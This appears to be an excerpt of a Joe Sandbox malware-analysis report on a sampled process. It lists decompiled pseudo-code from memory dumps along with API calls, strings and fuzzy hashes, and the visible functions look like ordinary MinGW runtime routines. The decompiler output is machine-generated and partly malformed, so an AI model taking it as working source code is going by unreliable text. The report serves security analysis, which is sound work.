                        				E00007FF67FF6935D6770(_t20, _t24);
                        				if (_t20 - _t20 > 0) goto 0x935cfa70;
                        				_t26 =  *_t27;
                        				_t1 = _t26 + 3; // 0x3
                        				if (_t1 - 3 <= 0) goto 0x935cfa91;
                        				if (_t26 == 0) goto 0x935cfaa4;
                        				r13d = 1;
                        				 *_t26 = r13d;
                        				if ( *_t26 != 0) goto 0x935cfac8;
                        				if ( *((intOrPtr*)(_t26 + 4)) != 0) goto 0x935cfab8;
                        				return 0;
                        			}

                        Listing addresses 0x7ff6935cfa00 to 0x7ff6935cfa6a (address column only; the instruction text was not rendered in this export)

                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        Similarity
                        • API ID: Time$FileSystem
                        • String ID:
                        • API String ID: 2086374402-0
                        • Opcode ID: 5cb66feed3387bb1f6bca0632056a1b959e464790da27da300eaa3bad0ac8f63
                        • Instruction ID: 02cf89612e8a31751295cd94586e5cd89397ba5d2e4490753bda729953d6f1c4
                        • Opcode Fuzzy Hash: 5cb66feed3387bb1f6bca0632056a1b959e464790da27da300eaa3bad0ac8f63
                        • Instruction Fuzzy Hash: 3041C532B0865246FF759A25984B63A629DEF08B98F5540B5DD1CE63C0EF7CEC85C340
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00007FF67FF6935CF8A0(intOrPtr* __rcx) {
                        				intOrPtr* _t16;
                        
                        				_t16 =  *((intOrPtr*)(__rcx));
                        				_t1 = _t16 + 3; // 0x3
                        				if (_t1 - 3 <= 0) goto 0x935cf900;
                        				if (_t16 == 0) goto 0x935cf910;
                        				 *_t16 = 1;
                        				if ( *_t16 != 0) goto 0x935cf920;
                        				if ( *((intOrPtr*)(_t16 + 4)) != 0) goto 0x935cf8e0;
                        				return 0;
                        			}

                        Listing addresses 0x7ff6935cf8a9 to 0x7ff6935cf8df (address column only; the instruction text was not rendered in this export)

                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        Similarity
                        • API ID: CurrentThread
                        • String ID:
                        • API String ID: 2882836952-0
                        • Opcode ID: cc74e13d8882e4cdba1e109f71e01e28e67532df65dd771045bf9f1cf09b7f8c
                        • Instruction ID: b010afa58580ee36330ed1ad9ca6cfeabaec06a98148a306b0d5b53d50540bcd
                        • Opcode Fuzzy Hash: cc74e13d8882e4cdba1e109f71e01e28e67532df65dd771045bf9f1cf09b7f8c
                        • Instruction Fuzzy Hash: B631C733F0921282FF768B25A84B76A21A8FF447A9F5544B5DE08E6280EF3CD881C350
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 79%
                        			E00007FF67FF6935D4690(void* __ecx, void* __rax, long long __rdx) {
                        				void* _t15;
                        				void* _t18;
                        				void* _t20;
                        				signed long long _t25;
                        
                        				_t18 = __rax;
                        				_t15 = __ecx;
                        				r12d = GetLastError();
                        				E00007FF67FF6935D2100(__ecx, __rdx);
                        				_t1 = _t18 + 0x68; // 0x68
                        				_t20 = _t18;
                        				E00007FF67FF6935D7BF0(_t1, __rdx);
                        				if ( *((intOrPtr*)(_t20 + 0x48)) - _t15 <= 0) goto 0x935d4700;
                        				 *((long long*)( *((intOrPtr*)(_t20 + 0x50)) + _t25 * 8)) = __rdx;
                        				 *((char*)( *((intOrPtr*)(_t20 + 0x58)) + _t25)) = 1;
                        				E00007FF67FF6935D7C30(_t1);
                        				SetLastError(??);
                        				return 0;
                        			}

                        Listing addresses 0x7ff6935d4690 to 0x7ff6935d46fa (address column only; the instruction text was not rendered in this export)

                        APIs
                        • GetLastError.KERNEL32 ref: 00007FF6935D46A5
                          • Part of subcall function 00007FF6935D2100: TlsGetValue.KERNEL32 ref: 00007FF6935D2160
                        • SetLastError.KERNEL32 ref: 00007FF6935D46E2
                        • realloc.MSVCRT(00000000,?,?,00007FF6935C14F6,00007FF6935CF6BB,000002954BDC1770,00000000,00007FF898063CA0,00007FF6935C2B7A), ref: 00007FF6935D4713
                        • realloc.MSVCRT(00000000,?,?,00007FF6935C14F6,00007FF6935CF6BB,000002954BDC1770,00000000,00007FF898063CA0,00007FF6935C2B7A), ref: 00007FF6935D4727
                        • memset.MSVCRT ref: 00007FF6935D475D
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        Similarity
                        • API ID: ErrorLastrealloc$Valuememset
                        • String ID:
                        • API String ID: 2591390167-0
                        • Opcode ID: e7d90648816314fb3f1ee89ea78401502af506a05b12dda8d1466fd740f6319f
                        • Instruction ID: 059f6a5f72a9b925640eb93f81ac291b61d7ebbabaa8f4573298dccbbfa7e27f
                        • Opcode Fuzzy Hash: e7d90648816314fb3f1ee89ea78401502af506a05b12dda8d1466fd740f6319f
                        • Instruction Fuzzy Hash: 8A21F426B2570196EB349F2AA80257D2399EF49B94F840076DD1DA7391DE3CD885C380
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        Similarity
                        • API ID: CriticalSection$Leave$EnterReleaseSemaphore
                        • String ID:
                        • API String ID: 2813224205-0
                        • Opcode ID: f7b3bd804d4e3881b65cedab608d9f7cba374d45e9b898210924642bdba9936f
                        • Instruction ID: 1f8d935b011a6f81000c687d6fa05687baff776b787d813393f31b1f9a2d33bc
                        • Opcode Fuzzy Hash: f7b3bd804d4e3881b65cedab608d9f7cba374d45e9b898210924642bdba9936f
                        • Instruction Fuzzy Hash: A001D232B0461692FA668F6B7C832659248FF99773F84457ACD2D96360DD3C98C6C300
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00007FF67FF6935D9280(void* __rcx) {
                        
                        				if (__rcx != 0) goto 0x935d9298;
                        				return 0;
                        			}

                        Listing addresses 0x7ff6935d928b to 0x7ff6935d9294 (address column only; the instruction text was not rendered in this export)

                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        Similarity
                        • API ID: Process$CloseCurrentHandleOpen
                        • String ID:
                        • API String ID: 2750122171-0
                        • Opcode ID: 977eb1a34e31103f10e9055bdcd37474cfb9060e756ebba1097c90a2cdde1493
                        • Instruction ID: 3f9159ed29404ea48bf32ed3785f86cf81aedef0dc7e30ff6fdb53b0d689fafe
                        • Opcode Fuzzy Hash: 977eb1a34e31103f10e9055bdcd37474cfb9060e756ebba1097c90a2cdde1493
                        • Instruction Fuzzy Hash: 52F0E930A1D603C6FBB54FB254830782299DF48716F680678C53EF52D4DE3CA4885221
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00007FF67FF6935CDEC9() {
                        				signed int _t7;
                        				void* _t11;
                        				void* _t16;
                        				signed int** _t19;
                        
                        				 *((intOrPtr*)(_t16 + 0x41909090)) =  *((intOrPtr*)(_t16 + 0x41909090)) + _t11;
                        				_t7 =  *( *_t19);
                        				if ((_t7 & 0x20ffffff) == 0x20474343) goto 0x935cdfb0;
                        				if (_t7 - 0xc0000096 > 0) goto 0x935cdf97;
                        				if (_t7 - 0xc000008b <= 0) goto 0x935cdf48;
                        				if (_t7 + 0x3fffff73 - 9 > 0) goto 0x935cdf38;
                        				goto __rax;
                        			}

                        0x7ff6935cdecb
                        0x7ff6935cded9
                        0x7ff6935cdeec
                        0x7ff6935cdef7
                        0x7ff6935cdf02
                        0x7ff6935cdf0c
                        0x7ff6935cdf1c

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: signal
                        • String ID: CCG
                        • API String ID: 1946981877-1584390748
                        • Opcode ID: 0668ec46346458bce498e757017dfe711463f7871f3ee1d7bd7ad3fffce19cc4
                        • Instruction ID: c5ae5ae898926174cf581a7a5b5f4617c1118e958ca8df5a504ce183fa03d1a9
                        • Opcode Fuzzy Hash: 0668ec46346458bce498e757017dfe711463f7871f3ee1d7bd7ad3fffce19cc4
                        • Instruction Fuzzy Hash: 4521B061E1D60646FE785269846333821C9FF8D32CF698AB6D93DE33D0DE6CE8C18211
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 66%
                        			E00007FF67FF6935D30C0(void* __edi, long long __rcx, void* __rdx, void* _a8, long long _a32, long long _a40, intOrPtr _a96) {
                        				intOrPtr _t9;
                        				long _t13;
                        				void* _t14;
                        				intOrPtr _t17;
                        				intOrPtr* _t22;
                        				long long _t24;
                        
                        				_t9 =  *0x936023c0; // 0x0
                        				_a8 = __rcx;
                        				if (_t9 == 0) goto 0x935d315c;
                        				_t22 = _a8;
                        				if (_t22 != 0) goto 0x935d3110;
                        				r8d = GetCurrentThreadId();
                        				_pop(_t24);
                        				goto 0x935e0a20;
                        				asm("o16 nop [eax+eax]");
                        				E00007FF67FF6935D2550(__edi, _a96);
                        				E00007FF67FF6935D2550(__edi, _a96);
                        				_t17 =  *_t22;
                        				_t13 = GetCurrentThreadId();
                        				_t14 = E00007FF67FF6935D2550(_t17, _a96);
                        				_a40 = _t24;
                        				r9d = _t17;
                        				r8d = _t13;
                        				_a32 =  *((intOrPtr*)(_t22 + 0x28));
                        				0x935e0a20();
                        				return _t14;
                        			}

                        0x7ff6935d30c8
                        0x7ff6935d30ce
                        0x7ff6935d30d8
                        0x7ff6935d30de
                        0x7ff6935d30e6
                        0x7ff6935d30fa
                        0x7ff6935d3101
                        0x7ff6935d3105
                        0x7ff6935d310a
                        0x7ff6935d3115
                        0x7ff6935d3123
                        0x7ff6935d3128
                        0x7ff6935d312a
                        0x7ff6935d3137
                        0x7ff6935d313c
                        0x7ff6935d3141
                        0x7ff6935d3144
                        0x7ff6935d3147
                        0x7ff6935d3156
                        0x7ff6935d3164

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: CurrentThread
                        • String ID: T%p %d %s$T%p %d V=%0X H=%p %s
                        • API String ID: 2882836952-2059990036
                        • Opcode ID: dc1de9012fa21fc8e41161c0c1d3d78ff8af58678dd38c2bfadd6608a3e95863
                        • Instruction ID: 5ab57d4ba543249745c1f2f5dfcc341730f25ff3616206e8d68fb8fdc2bc7c18
                        • Opcode Fuzzy Hash: dc1de9012fa21fc8e41161c0c1d3d78ff8af58678dd38c2bfadd6608a3e95863
                        • Instruction Fuzzy Hash: 2D01A132B0870682E6319F67E8024AA6369FB8CB94F480176EE5CA7365EE3CE445C740
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: _assertcalloc
                        • String ID: !dso || dso == &__dso_handle$C:/crossdev/src/mingw-w64-v8-git/mingw-w64-crt/crt/tls_atexit.c
                        • API String ID: 615528074-4180103562
                        • Opcode ID: 997d33b97b57c5b7e2d8e411824f605c6be887a0d2b9bc600b613865c56a2171
                        • Instruction ID: 050c21351b6dd1d2ff62f5b93c8115dce57fd03cabb37e99425707ebc3095cf2
                        • Opcode Fuzzy Hash: 997d33b97b57c5b7e2d8e411824f605c6be887a0d2b9bc600b613865c56a2171
                        • Instruction Fuzzy Hash: 47015E72B1860251FA758B55F8522B92298EF48784F8581B0DE1CE7795EE2CD9919340
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 43%
                        			E00007FF67FF6935CD5B0(void* __rax, void* __rcx, void* __rdx, intOrPtr* __r8, intOrPtr* __r9) {
                        				intOrPtr _v48;
                        				long long _v56;
                        				long long _v64;
                        				char _v72;
                        				void* _t10;
                        				void* _t14;
                        				void* _t15;
                        				intOrPtr* _t28;
                        				intOrPtr* _t36;
                        
                        				_t36 = __r8;
                        				_t28 = __r9;
                        				if (__rcx == 0) goto 0x935cd6a0;
                        				if (__rdx == 0) goto 0x935cd5db;
                        				if (__r8 == 0) goto 0x935cd6a0;
                        				_v72 = 0;
                        				_v64 = 0;
                        				_v56 = 0;
                        				_v48 = 0;
                        				if (E00007FF67FF6935CCB20(_t10, _t15, __rax, __rcx, 0x7ff6935c45b0,  &_v72) == 0) goto 0x935cd6e0;
                        				if (_v48 == 0) goto 0x935cd680;
                        				if (_v72 == 0) goto 0x935cd6fd;
                        				if (__rdx == 0) goto 0x935cd6d0;
                        				strlen(??);
                        				if (__rax -  *_t36 >= 0) goto 0x935cd6c0;
                        				_t14 = memcpy(??, ??, ??);
                        				free(??);
                        				if (_t28 == 0) goto 0x935cd66d;
                        				 *_t28 = 0;
                        				return _t14;
                        			}

                        0x7ff6935cd5be
                        0x7ff6935cd5c1
                        0x7ff6935cd5c7
                        0x7ff6935cd5d0
                        0x7ff6935cd5d5
                        0x7ff6935cd5e7
                        0x7ff6935cd5f0
                        0x7ff6935cd5f9
                        0x7ff6935cd602
                        0x7ff6935cd611
                        0x7ff6935cd622
                        0x7ff6935cd62c
                        0x7ff6935cd635
                        0x7ff6935cd63e
                        0x7ff6935cd646
                        0x7ff6935cd652
                        0x7ff6935cd65d
                        0x7ff6935cd665
                        0x7ff6935cd667
                        0x7ff6935cd67b

                        APIs
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: freememcpystrlen
                        • String ID:
                        • API String ID: 2208669145-0
                        • Opcode ID: 63170e71b3aefe088590c312e8055d4beb86fddca5082f947a9aa7bf25b6fed5
                        • Instruction ID: 4b22a57d97029a96c68a2ab71388bfee31ea26ee099e83fd30f7d5251ef1f50f
                        • Opcode Fuzzy Hash: 63170e71b3aefe088590c312e8055d4beb86fddca5082f947a9aa7bf25b6fed5
                        • Instruction Fuzzy Hash: E7318E22A0964241FEB66E11A61277B52D8FF4C79CF5841B1DE8EEB6C4DF3CA485C780
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: memset
                        • String ID:
                        • API String ID: 2221118986-0
                        • Opcode ID: 2489395c034ba57bd35dde6236fff361f01b3e42c75a40a51da277e3b9fff7c5
                        • Instruction ID: e8b552365437747afb3ca05289044c9a71f602563508f5a978f4ca0e673042c5
                        • Opcode Fuzzy Hash: 2489395c034ba57bd35dde6236fff361f01b3e42c75a40a51da277e3b9fff7c5
                        • Instruction Fuzzy Hash: 77C1D46AE1924146F7318B25800633A2AA9FF087A8F1442B6DE7EF77C5CE3DF9418740
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: memset
                        • String ID:
                        • API String ID: 2221118986-0
                        • Opcode ID: 9fde42beae9ca2f6261fd7f56039f3d725da2ad692f88566958c967d768da1c9
                        • Instruction ID: 8146b632ba3478ea6ff64b76f5aadbe31a9e1fd607bcafcb8468e7a4f633c394
                        • Opcode Fuzzy Hash: 9fde42beae9ca2f6261fd7f56039f3d725da2ad692f88566958c967d768da1c9
                        • Instruction Fuzzy Hash: 7BC1D663E0824246E7715A25800237A2ADAFF49758F1942B6DE3DAB7CDCE3DE845C741
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 28%
                        			E00007FF67FF6935CCB20(signed int __eax, signed int __edx, void* __rax, signed char* __rcx, long long __rdx, long long __r8) {
                        				signed int _t83;
                        				void* _t86;
                        				int _t89;
                        				signed int _t91;
                        				void* _t94;
                        				signed int _t108;
                        				void* _t111;
                        				void* _t113;
                        				long long _t137;
                        				signed long long _t140;
                        				unsigned long long _t160;
                        				long long* _t165;
                        				void* _t166;
                        				void* _t167;
                        				void* _t168;
                        				void* _t169;
                        				void* _t170;
                        				signed long long _t182;
                        				void* _t184;
                        				signed char* _t188;
                        				void* _t189;
                        				signed char* _t190;
                        
                        				_t167 = _t166 - 0x218;
                        				_t165 = _t167 + 0x80;
                        				r15d =  *__rcx & 0x000000ff;
                        				_t111 = r15b - 0x5f;
                        				if (_t111 == 0) goto 0x935cce90;
                        				asm("repe cmpsb");
                        				asm("sbb al, 0x0");
                        				r14d = 0;
                        				if ((__eax & 0xffffff00 | _t111 > 0x00000000) != 0) goto 0x935ccba0;
                        				_t113 = (__rcx[8] & 0x000000ff) - 0x24 - 0x3b;
                        				if (_t113 > 0) goto 0x935ccba0;
                        				asm("dec eax");
                        				if (_t113 >= 0) goto 0x935ccba0;
                        				_t83 = __rcx[9] & 0x000000ff;
                        				if (_t83 == 0x44) goto 0x935cced0;
                        				if (_t83 == 0x49) goto 0x935cced0;
                        				strlen(??);
                        				 *((long long*)(_t165 - 0x50)) = __rcx;
                        				 *((intOrPtr*)(_t165 - 0x40)) = 0x11;
                        				r8d = __rax + __rax;
                        				 *((long long*)(_t165 - 0x48)) = __rax + __rcx;
                        				 *(_t165 - 0x38) = __rcx;
                        				 *(_t165 - 0x24) = r8d;
                        				 *((intOrPtr*)(_t165 - 0x28)) = 0;
                        				 *((intOrPtr*)(_t165 - 0x14)) = __edx;
                        				 *((intOrPtr*)(_t165 - 0x18)) = 0;
                        				 *((long long*)(_t165 - 0x10)) = 0;
                        				 *((long long*)(_t165 - 8)) = 0;
                        				 *_t165 = 0;
                        				if (r8d - 0x800 > 0) goto 0x935cce73;
                        				_t86 = E00007FF67FF6935CEA40(0);
                        				_t168 = _t167 - (r8d << 5);
                        				_t160 = _t168 + 0x27;
                        				E00007FF67FF6935CEA40(_t86);
                        				_t169 = _t168 - (0x0000000f + __edx * 0x00000008 & 0xfffffff0);
                        				 *(_t165 - 0x30) = _t160 & 0xfffffff8;
                        				_t137 = _t169 + 0x20;
                        				 *((long long*)(_t165 - 0x20)) = _t137;
                        				if (r14d == 1) goto 0x935ccea8;
                        				_t23 = _t189 - 2; // -2
                        				if (_t23 - 1 > 0) goto 0x935cceb8;
                        				_t190 =  &(__rcx[0xb]);
                        				 *(_t165 - 0x38) = _t190;
                        				if (__rcx[0xb] != 0x5f) goto 0x935ccc78;
                        				if (__rcx[0xc] == 0x5a) goto 0x935ccff2;
                        				 *(_t165 - 0x60) = _t160 >> 3;
                        				 *(_t165 - 0x54) = r8d;
                        				_t89 = strlen(??);
                        				r8d =  *(_t165 - 0x54);
                        				_t182 =  *(_t165 - 0x60);
                        				if (r8d <= 0) goto 0x935ccfb3;
                        				 *((long long*)(4 + _t182 * 8)) = 0;
                        				 *((intOrPtr*)(_t165 - 0x28)) = 1;
                        				if (_t89 <= 0) goto 0x935ccfb3;
                        				 *(_t182 * 8) = 0;
                        				 *(0x10 + _t182 * 8) = _t190;
                        				 *(0x18 + _t182 * 8) = _t89;
                        				r9d = 0;
                        				E00007FF67FF6935C4190();
                        				strlen(??);
                        				_t188 =  &(( *(_t165 - 0x38))[_t137]);
                        				 *(_t165 - 0x38) = _t188;
                        				_t91 =  *_t188 & 0x000000ff;
                        				if (_t91 != 0) goto 0x935cceae;
                        				if (_t137 == 0) goto 0x935cceae;
                        				 *((long long*)(_t165 + 0x120)) = __rdx;
                        				_t184 = _t165 + 0x10;
                        				 *((char*)(_t165 + 0x118)) = 0;
                        				 *((long long*)(_t165 + 0x110)) = 0;
                        				 *((long long*)(_t165 + 0x128)) = __r8;
                        				 *((long long*)(_t165 + 0x130)) = 0;
                        				 *((long long*)(_t165 + 0x138)) = 0;
                        				 *((long long*)(_t165 + 0x140)) = 0;
                        				 *((long long*)(_t165 + 0x148)) = 0;
                        				 *((intOrPtr*)(_t165 + 0x150)) = 0;
                        				 *((long long*)(_t165 + 0x158)) = 0;
                        				 *((long long*)(_t165 + 0x160)) = 0;
                        				 *((long long*)(_t165 + 0x168)) = 0;
                        				 *((long long*)(_t165 + 0x170)) = 0;
                        				 *((long long*)(_t165 + 0x178)) = 0;
                        				E00007FF67FF6935C4470();
                        				if ( *((intOrPtr*)(_t165 + 0x144)) - 0x7ff > 0) goto 0x935ccdcc;
                        				 *((intOrPtr*)(_t165 + 0x144)) = 0;
                        				 *((long long*)(_t165 + 0x180)) = 0;
                        				_t108 =  *(_t165 + 0x17c) * _t91;
                        				_t139 =  <=  ? _t184 :  *((intOrPtr*)(_t165 + 0x16c));
                        				_t140 = ( <=  ? _t184 :  *((intOrPtr*)(_t165 + 0x16c))) << 4;
                        				 *(_t165 + 0x17c) = _t108;
                        				E00007FF67FF6935CEA40(_t91);
                        				_t170 = _t169 - _t140;
                        				_t94 =  >  ? _t108 : 1;
                        				E00007FF67FF6935CEA40(_t140);
                        				 *((long long*)(_t165 + 0x160)) = _t170 + 0x20;
                        				 *((long long*)(_t165 + 0x170)) = _t170 - (_t140 << 4) + 0x20;
                        				E00007FF67FF6935CB3A0(_t184, _t137);
                        				 *((char*)(_t165 +  *((intOrPtr*)(_t165 + 0x110)) + 0x10)) = 0;
                        				 *((intOrPtr*)(_t165 + 0x120))();
                        				return 0 |  *((intOrPtr*)(_t165 + 0x140)) == 0x00000000;
                        			}

                        0x7ff6935ccb2c
                        0x7ff6935ccb33
                        0x7ff6935ccb3b
                        0x7ff6935ccb48
                        0x7ff6935ccb4c
                        0x7ff6935ccb61
                        0x7ff6935ccb66
                        0x7ff6935ccb68
                        0x7ff6935ccb6d
                        0x7ff6935ccb77
                        0x7ff6935ccb79
                        0x7ff6935ccb85
                        0x7ff6935ccb89
                        0x7ff6935ccb8b
                        0x7ff6935ccb92
                        0x7ff6935ccb9a
                        0x7ff6935ccba3
                        0x7ff6935ccba8
                        0x7ff6935ccbb2
                        0x7ff6935ccbb9
                        0x7ff6935ccbbd
                        0x7ff6935ccbc3
                        0x7ff6935ccbc7
                        0x7ff6935ccbcb
                        0x7ff6935ccbd2
                        0x7ff6935ccbd5
                        0x7ff6935ccbdc
                        0x7ff6935ccbe4
                        0x7ff6935ccbec
                        0x7ff6935ccbfb
                        0x7ff6935ccc0b
                        0x7ff6935ccc10
                        0x7ff6935ccc16
                        0x7ff6935ccc32
                        0x7ff6935ccc37
                        0x7ff6935ccc3a
                        0x7ff6935ccc3e
                        0x7ff6935ccc43
                        0x7ff6935ccc4b
                        0x7ff6935ccc51
                        0x7ff6935ccc58
                        0x7ff6935ccc5e
                        0x7ff6935ccc67
                        0x7ff6935ccc6b
                        0x7ff6935ccc72
                        0x7ff6935ccc7b
                        0x7ff6935ccc7f
                        0x7ff6935ccc83
                        0x7ff6935ccc88
                        0x7ff6935ccc8c
                        0x7ff6935ccc93
                        0x7ff6935ccc99
                        0x7ff6935ccca5
                        0x7ff6935cccae
                        0x7ff6935cccb4
                        0x7ff6935cccc4
                        0x7ff6935ccccc
                        0x7ff6935ccce3
                        0x7ff6935ccce9
                        0x7ff6935cccf8
                        0x7ff6935cccfd
                        0x7ff6935ccd00
                        0x7ff6935ccd04
                        0x7ff6935ccd0b
                        0x7ff6935ccd14
                        0x7ff6935ccd1a
                        0x7ff6935ccd21
                        0x7ff6935ccd2b
                        0x7ff6935ccd32
                        0x7ff6935ccd3d
                        0x7ff6935ccd44
                        0x7ff6935ccd4f
                        0x7ff6935ccd5a
                        0x7ff6935ccd65
                        0x7ff6935ccd70
                        0x7ff6935ccd7a
                        0x7ff6935ccd85
                        0x7ff6935ccd90
                        0x7ff6935ccd9b
                        0x7ff6935ccda6
                        0x7ff6935ccdb1
                        0x7ff6935ccdc0
                        0x7ff6935ccdc2
                        0x7ff6935ccde1
                        0x7ff6935ccdec
                        0x7ff6935ccdf1
                        0x7ff6935ccdf5
                        0x7ff6935ccdf9
                        0x7ff6935ccdff
                        0x7ff6935cce04
                        0x7ff6935cce0b
                        0x7ff6935cce19
                        0x7ff6935cce26
                        0x7ff6935cce38
                        0x7ff6935cce3f
                        0x7ff6935cce58
                        0x7ff6935cce5d
                        0x7ff6935cce86

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
